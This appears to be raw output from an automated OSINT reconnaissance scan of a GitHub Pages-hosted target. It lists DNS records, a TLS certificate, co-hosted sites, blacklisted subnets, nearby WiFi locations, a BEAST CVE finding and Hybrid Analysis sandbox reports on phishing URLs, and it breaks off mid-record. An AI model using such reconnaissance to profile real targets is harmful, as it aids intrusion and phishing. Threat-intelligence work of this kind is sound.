| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 70.170.74.34.bc.googleusercontent.com | 34.74.170.70 |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.33): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 006f10 (Net ID: 00:02:2D:00:6F:10) | 37.7642, -122.3993 |
| 2023-05-12 02:44:12 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b8:b0:60:0e:1a:2f:f1:b1:86:4b:64:ec:11:9f:
a6:79:be:e8:87:f1:88:c5:b4:49:9b:10:bb:ca:af:
ea:af:be:54:0c:78:43:7f:ca:7b:4e:45:5b:0b:24:
29:f1:bb:23:fc:19:a4:c7:6c:70:49:76:53:d3:09:
23:65:b2:48:7b:b6:1c:aa:07:1a:e2:79:1a:f9:7a:
5e:e7:16:f8:a6:4a:d5:39:a3:e2:0d:f7:57:ef:ed:
f8:08:76:5b:52:da:8b:d0:e6:1e:6e:2f:f9:0f:99:
4b:6a:52:ca:34:e1:a4:c9:20:33:d3:97:e8:7a:77:
c5:03:10:26:41:82:61:47:a2:af:c4:56:3f:76:a2:
38:cb:b2:70:ae:72:7a:43:c1:7e:27:a3:5e:d6:e3:
f6:e7:a5:30:70:bd:2a:96:27:7a:7b:fb:40:d2:57:
77:af:23:12:27:42:3a:c6:0b:6a:8c:bd:ba:2d:ee:
3f:9f:15:ee:62:57:a4:a6:95:50:af:43:b0:ac:76:
b8:e1:0e:d9:ff:56:ec:74:50:86:b5:1f:96:2c:d1:
95:05:e5:b7:05:67:93:4e:9e:f2:5a:38:1f:a7:8f:
43:5a:de:3c:57:da:48:7a:50:c6:88:38:15:c8:97:
2c:2c:ec:f8:39:09:36:bd:19:8d:03:56:41:66:07:
24:e3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AA:7E:67:D2:3B:C3:31:79:E5:59:FD:
F2:73:AA:A0:41:A7:E5:6A:79:10:D4:39:40:55:1B:24:
D3:3A:7E:37:7B:02:21:00:94:F4:4B:6E:E6:98:65:25:
A6:A3:62:0C:00:CF:F8:9A:3C:0B:A9:18:1C:5F:BB:53:
A4:D8:EF:86:C7:5C:70:1A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:82:E0:7E:5D:05:40:34:18:F6:30:F7:
09:CD:BC:FE:2C:13:EB:90:30:CE:10:ED:E8:A7:9D:A3:
74:75:12:5B:72:02:20:5D:1F:9D:87:56:AA:F7:6D:9A:
04:0D:4A:7B:35:DE:90:29:A5:D4:16:A7:8F:DF:FE:37:
AB:35:8B:24:23:B9:2B
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:13:FF:00:36:A8:61:87:48:A6:6A:04:09:
BC:E3:3E:AA:13:E7:46:3D:06:75:68:23:18:E7:6A:45:
49:F7:30:F1:02:20:3F:F4:9C:8A:E6:46:D3:65:F6:98:
13:BF:9A:20:D3:DA:10:A9:E3:2E:5D:DA:C7:3B:14:4E:
4F:4E:1C:82:A5:B3
Signature Algorithm: sha256WithRSAEncryption
37:a4:1b:11:22:9f:fc:9f:c9:67:07:8f:aa:86:13:9f:e0:08:
1d:6e:0c:8d:65:fb:03:79:50:c6:76:ba:30:90:a0:a4:1c:79:
13:07:b9:5a:18:8d:97:4c:05:71:8a:d0:22:17:c6:19:a2:22:
8b:03:f6:2c:84:71:6c:55:df:e2:99:43:65:e5:d7:b7:b7:37:
4c:c6:c8:e5:f1:d8:a7:7b:07:5d:eb:b8:1c:50:a4:a3:8e:f0:
4c:f8:b8:6a:72:59:be:43:0e:8a:de:b5:5e:8f:9e:3f:5a:43:
64:82:cc:e0:de:76:f4:be:a6:12:0a:06:68:bb:77:e1:4c:ef:
4b:4d:67:af:f6:72:c7:6b:1b:9c:48:53:a7:7f:ed:76:18:5c:
f0:f6:c6:4c:24:53:57:57:e1:42:a6:3d:ae:e1:f5:93:f2:6a:
fa:29:72:01:3e:b7:06:f1:2f:1a:0e:91:c5:ec:35:bf:f5:da:
33:95:de:24:12:0d:f5:c3:23:8d:40:82:d1:5c:eb:de:0a:08:
e8:e5:83:e5:0a:8b:3a:5e:98:4e:77:4f:9f:dc:ab:7e:ce:a8:
28:4f:aa:79:4f:c9:be:8f:60:88:6e:6b:f9:20:6c:7f:38:96:
d6:da:d7:11:03:43:d8:b8:51:87:ce:32:22:4d:64:4c:c4:75:
27:d0:e3:df
| www.battleb0t.xyz |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007joshie.github.io | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | okidoki (Category: misc)
https://m.okidoki.ee/ru/users/login/ | login |
| 2023-05-12 02:49:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://swapnildhar.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_be4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_be4_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_be4_IESQMMUTEX_0_303"\n "IsoScope_be4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_be4_ConnHashTable<3044>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3044"\n "IsoScope_be4_IE_EarlyTabStart_0xf04_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3044"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"swapnildhar.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"swapnildhar.github.io"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "RecoveryStore._56541BDB-B524-11ED-B006-080027895A87_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "KDVBE78T.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KDVBE78T.txt]- [targetUID: 00000000-00003044]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF2902082A70CBB468.TMP" has type "data"- Location: [%TEMP%\\~DF2902082A70CBB468.TMP]- [targetUID: 00000000-00003044]\n "~DF660FBB2F5FAF54EA.TMP" has type "data"- Location: [%TEMP%\\~DF660FBB2F5FAF54EA.TMP]- [targetUID: 00000000-00003044]\n "SG4BKA73.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SG4BKA73.txt]- [targetUID: 00000000-00002448]\n "51F6C1W2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\51F6C1W2.txt]- [targetUID: 00000000-00003044]\n "_03447F9C-B539-11ED-B006-080027895A87_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF608291201A71A7C4.TMP" has type "data"- Location: [%TEMP%\\~DF608291201A71A7C4.TMP]- [targetUID: 00000000-00003044]\n "~DF4685BFF93C1B0012.TMP" has type "data"- Location: [%TEMP%\\~DF4685BFF93C1B0012.TMP]- [targetUID: 00000000-00003044]\n "_4B95C1A6-B526-11ED-B006-080027895A87_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003044]\n "GLYP65QM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GLYP65QM.txt]- [targetUID: 00000000-00002448]\n "NQMTP33S.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NQMTP33S.txt]- [targetUID: 00000000-00003044]\n "90EJD0O1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\90EJD0O1.txt]- [targetUID: 00000000-00003044]\n "_56541BDD-B524-11ED-B006-080027895A87_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://swapnildhar.github.io/"\n Pattern match: "http://swapnildhar.github.io"\n Heuristic match: "swapnildhar.github.io"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'13/88 reputation engines marked "http://swapnildhar.github.io/" as malicious (14% detection rate)\n 13/88 reputation engines marked "http://swapnildhar.github.io" as malicious (14% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'13/88 Antivirus vendors marked sample as malicious (14% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'13/88 Antivirus vendors marked sample as malicious (14% detection rate)'}], u'threat_level': 2, u'size': None, u'job_id': u'63fa39e4a1c3c405a6029125', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'185.199.110.153'], u'sha256': u'4aa7f4ef0c9ad572a6cacbe871a16a638546dd3e9c3b4c52b76bfec2d3daa98b', u'sha512': u'c44b86d89e49a31574adbd55fe572e244529dda3f0d8b76c772412b507662cd526dd777b4a4af97c706ce05cf3ef40ab96d410c86750eaa8374e7baa003a23b9', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://swapnildhar.github.io/', u'submission_id': u'63fa39e4a1c3c405a6029126', u'created_at': u'2023-02-25T16:40:04+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-25T16:40:04+00:00', u'tags': [u'phishing'], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 7, u'machine_learning_models': [], u't | 185.199.110.153 |
| 2023-05-12 02:56:18 | Netblock Membership | No | RIPE | 0 | 0 | 2 | 0 | None | 188.114.96.0/24 | 188.114.96.1 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | krommewaal (Net ID: 00:01:71:0A:07:2B) | 52.3759, 4.8975 |
| 2023-05-12 03:01:16 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.140): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:39 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01.github.io |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.187): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:41 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | 188.114.97.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CMMC (Net ID: 00:02:6F:DF:89:25) | 32.8608, -79.9746 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007jedgar.github.io | 185.199.111.153 |
| 2023-05-12 02:58:27 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.dropbox.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /zippy-tapioca-dce411.netlify.app/index.html HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /zippy-tapioca-dce411.netlify.app/index.html HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /zippy-tapioca-dce411.netlify.app/logo.html HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /zippy-tapioca-dce411.netlify.app/logo.html HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /zippy-tapioca-dce411.netlify.app/att.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /zippy-tapioca-dce411.netlify.app/att.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /zippy-tapioca-dce411.netlify.app/jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /zippy-tapioca-dce411.netlify.app/jquery.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /boards.cdn.greenhouse.io/assets/application-556da0335bb572236cd3aea6c3eeaaae6cf540bff95fe197ff25ae9af312a481.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /boards.cdn.greenhouse.io/assets/application-556da0335bb572236cd3aea6c3eeaaae6cf540bff95fe197ff25ae9af312a481.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /boards.cdn.greenhouse.io/assets/show_init-a1597e28bd287ce9ccfa9f99f287f0c27a5a277e5cb23115af8880da506e57ee.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /boards.cdn.greenhouse.io/assets/show_init-a1597e28bd287ce9ccfa9f99f287f0c27a5a277e5cb23115af8880da506e57ee.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /zippy-tapioca-dce411.netlify.app/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /zippy-tapioca-dce411.netlify.app/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /zippy-tapioca-dce411.netlify.app/responsive.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /zippy-tapioca-dce411.netlify.app/responsive.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: tangerine-gaufre-d39b6b.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /www.google.com/recaptcha/api.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://tangerine-gaufre-d39b6b.netlify.app/zippy-tapioca-dce411.netlify.app/index.html\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; 